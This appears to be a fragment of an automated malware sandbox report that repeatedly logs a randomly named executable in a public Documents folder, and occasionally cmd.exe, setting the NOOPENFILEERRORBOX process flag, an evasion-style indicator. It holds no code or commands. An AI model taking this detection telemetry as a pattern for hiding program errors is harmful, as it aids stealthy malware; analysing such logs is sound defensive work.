Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
